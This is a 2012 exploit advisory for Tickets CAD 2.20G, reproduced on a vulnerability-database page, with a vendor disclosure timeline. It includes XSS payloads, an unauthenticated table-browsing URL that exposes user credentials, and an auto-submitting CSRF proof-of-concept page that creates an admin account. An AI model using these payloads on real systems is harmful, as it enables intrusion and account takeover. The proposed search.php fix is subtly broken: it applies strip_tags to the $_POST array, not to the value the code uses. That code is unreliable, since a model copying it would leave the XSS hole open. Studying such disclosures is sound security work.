Vulners
Lucene search
Tickets CAD 2.20G Multiple Vulnerabilities
# Exploit Title: Tickets CAD 2.20G Multiple Vulnerabilities
# Date: Aug 4 2012
# Exploit Author: chap0 @_chap0
# Vendor Homepage: http://www.ticketscad.org
# Software Link: http://www.ticketscad.org/downloads/Tickets_06_22_2012_V220G.zip
# Version: 2.20G
# Tested on: Ubuntu
Tickets CAD 2.20G is vulnerable to multiple vulnerabilities including Reflective/Stored XSS,
information disclosure and CSRF. While logged in even with the default guest/guest
credentials, the guest user is able to store and execute arbitrary JavaScript code withing the
application. Information disclosure also exist, the application does not properly check
which user is currently logged in. Finally CSRF is also possible within the Tickets CAD
application which allows an attacker to successfully add an admin account.
# Disclosure Time line
# Jun 30 2012 - Contacted vendor
# Jun 30 2012 - Vendor responds ask for details
# Jun 30 2012 - Sent vendor vulnerability details
# Jul 01 2012 - Vendor responds vulnerability sent to Dev team
# Jul 09 2012 - Email to vendors for an update on issues
# Jul 18 2012 - Dev team responds vulnerabilities will be fix in next release
# Jul 23 2012 - Email to Dev team ask for an update and when next release will be issued
# Aug 04 2012 - Dev team became unresponsive Public Disclosure
[+] A Reflective XSS vulnerability exist in the search function, search.php within the application
'><script>alert('XSS')</script>
[+] A Stored XSS vulnerability exist in log.php while creating a new log entry
'><script>alert('XSS')</script>
[+] Both of these vulnerabilities can be prevented by using strip_tags:
search.php fix is on line 88 vulnerability on 87
86 <?php
87 //$post_frm_query = (array_key_exists('frm_query', ($_POST))) ? $_POST['frm_query'] : "" ;
88 $post_frm_query = (array_key_exists('frm_query', strip_tags($_POST))) ? $_POST['frm_query'] : "" ;
log.php fix is on line 148 vulnerable code on 147
146 case "add":
147 //do_log($GLOBALS['LOG_COMMENT'], $ticket_id=0, $responder_id=0, trim($_POST['frm_comment']));
148 do_log($GLOBALS['LOG_COMMENT'], $ticket_id=0, $responder_id=0, strip_tags(trim($_POST['frm_comment'])));
149 break;
[+] Information disclosure exist which allows users even the guest account to view the tables of the sql database.
If a user browses to:
http://<Server>/tables.php
they are able to select which table within the database they wish to view including ALL users credentials.
[+] CSRF poc, the password must be in md5 format in order for this attack to work
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://127.0.0.1/config.php?func=user&add=true&go=true">
<input type="hidden" name="frm_group[]" value="1"/>
<input type="hidden" name="frm_user" value="chap0"/>
<input type="hidden" name="frm_level" value="0"/>
<input type="hidden" name="frm_responder_sel" value="0"/>
<input type="hidden" name="frm_func" value="a"/>
<input type="hidden" name="frm_hash" value="916b5dbd201b469998d9b4a4c8bc4e08"/>
<input type="hidden" name="frm_responder_id" value="0"/>
</form>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1